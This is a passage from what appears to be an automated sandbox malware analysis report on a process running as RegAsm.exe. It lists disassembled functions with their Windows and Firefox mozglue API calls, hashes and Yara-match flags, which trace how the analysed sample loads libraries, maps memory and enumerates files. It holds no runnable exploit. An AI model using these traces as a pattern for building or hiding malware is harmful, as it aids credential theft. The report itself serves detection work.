                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                                                    • String ID: (null)$0
                                                                                                                                                                                                                                                    • API String ID: 4074790623-38302674
                                                                                                                                                                                                                                                    • Opcode ID: 58402d1eb57311de84442f6f2c1458b58a31c64b9289f2ab1d9dae6d3a15ad9e
                                                                                                                                                                                                                                                    • Instruction ID: a568a7ca34662b2328e59de3c0bd3419903358f0cf3828f60cae054592078c1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58402d1eb57311de84442f6f2c1458b58a31c64b9289f2ab1d9dae6d3a15ad9e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BA1B1316083419FDB10DF28C55475ABBF2BFCA748F04882DE9AA97741D731E80ACB86
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D48E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4ACB
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C71483A,?), ref: 6C6D4AE0
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4A82
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C71483A,?), ref: 6C6D4A97
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4A35
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C71483A,?), ref: 6C6D4A4A
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4AF4
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4B10
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4B2C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                                                                                                                    • String ID: :Hql
                                                                                                                                                                                                                                                    • API String ID: 4251373892-2994437733
                                                                                                                                                                                                                                                    • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                                                    • Instruction ID: 90cae42cfc9f3ec3a3b7ff31c71c2527c0ec24ad05b2d539abbf341de3bcb0da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31717AB19017069FCB14CF68C580AAABBF5FF19308B10467EE15A9BB41E731F959CB84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6FC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6FC784
                                                                                                                                                                                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6FC801
                                                                                                                                                                                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C6FC83D
                                                                                                                                                                                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6FC891
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                                                                                                                                                    • String ID: INF$NAN$inf$nan
                                                                                                                                                                                                                                                    • API String ID: 1991403756-4166689840
                                                                                                                                                                                                                                                    • Opcode ID: de21c8ecf68bf0b34d7c0210fcea40e8d15c8e6f16e15ddb1ddb108c78fadb3b
                                                                                                                                                                                                                                                    • Instruction ID: b29a47464855f5f467735a8e416b528b82ddc9e24ae2f7074c4cbc27a3c0343f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de21c8ecf68bf0b34d7c0210fcea40e8d15c8e6f16e15ddb1ddb108c78fadb3b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A15195705087449BD710DF2CC58169AFBF1BF8A308F408A2DE9E597650E771D985CB47
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D3492
                                                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D34A9
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D34EF
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C6D350E
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D3522
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D3552
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D357C
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D3592
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                    • Opcode ID: f7bc34c84e0b76775046cfedf7890a5f613ddf4fa5b9bfa153edb39e78c4fb8c
                                                                                                                                                                                                                                                    • Instruction ID: fb573e8d0258171a73925807098f4faebb11205adcf60205cd647f3c2e941a4f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7bc34c84e0b76775046cfedf7890a5f613ddf4fa5b9bfa153edb39e78c4fb8c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 443191B1F002099BDF04DFB9C958ABA77B9FB49305F954139E505A3690DF74BA04CB60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1192971331-0
                                                                                                                                                                                                                                                    • Opcode ID: b2c8a942ab846efdf809193745710f538f3816d5aea1fd96701f59dfbf7f8c20
                                                                                                                                                                                                                                                    • Instruction ID: fe0599d8b444dfd752c985318327c5c183249d3ff1f7c384356ab14a04203b6d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2c8a942ab846efdf809193745710f538f3816d5aea1fd96701f59dfbf7f8c20
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 013151B1A047048FDB00EF78D64926EBBF4BF85315F45893DE98997251EF70A448CB82
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040BC80 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107stringmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BCCF
                                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040BCE5
                                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040BD16
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(75AA5460,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD36
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD47
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD4E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(75AA5460,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD5E
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BD8A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                    • API String ID: 4020929367-2554083253
                                                                                                                                                                                                                                                    • Opcode ID: a1ec131c9622529f8e252459d8baac3cda204e40e365a87042187ef611e0825a
                                                                                                                                                                                                                                                    • Instruction ID: 59b5f8f87fb998f76227d35a9eb8424ad3cc3f3f24d88032332b26ce682a4c37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ec131c9622529f8e252459d8baac3cda204e40e365a87042187ef611e0825a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A31C6B6A002159FDB10DFA9DC44BAEBBB9EB8D310F04416EF915E7381DB349901CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6E9675
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E9697
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6E96E8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6E9707
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E971F
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9773
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6E97B7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97D0
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97EB
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9824
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 409848716-3880535382
                                                                                                                                                                                                                                                    • Opcode ID: bb97980b89471cfa29735502a488d0ad9b81ee0d57cc52aa2ac5b3e436215f1a
                                                                                                                                                                                                                                                    • Instruction ID: a23565bb3cfc3e18e967a2210b6ed1415a4bc6c4e50e180c7ac8cdd9ec070e50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb97980b89471cfa29735502a488d0ad9b81ee0d57cc52aa2ac5b3e436215f1a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66419EB1B012059FDF00DFA5E988E967BB4EF4A328F804939ED1597740DB30A918CBE1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00416BC7 Relevance: 15.1, APIs: 10, Instructions: 123stringfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D0), ref: 00416BDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D4), ref: 00416BF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 00416C34
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF5A0), ref: 00416C48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C5C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C6A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274D8), ref: 00416C7C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C90
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416D31
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00416D40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1847592606-0
                                                                                                                                                                                                                                                    • Opcode ID: 169741b3fe6da7ffec9413cafaec04529173838a0da687c86c5844cd2d93b0ec
                                                                                                                                                                                                                                                    • Instruction ID: 65b04e9cde4619abf843a48e71063a32351bbc74cf755bb2dfb2c7197d8a34fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 169741b3fe6da7ffec9413cafaec04529173838a0da687c86c5844cd2d93b0ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4441A5B5910218ABDB14EBA1DC86EEE7738AF49704F00459EF605A7190D778A788CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00416BC9 Relevance: 15.1, APIs: 10, Instructions: 123stringfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D0), ref: 00416BDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D4), ref: 00416BF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 00416C34
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF5A0), ref: 00416C48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C5C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C6A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274D8), ref: 00416C7C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C90
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416D31
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00416D40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
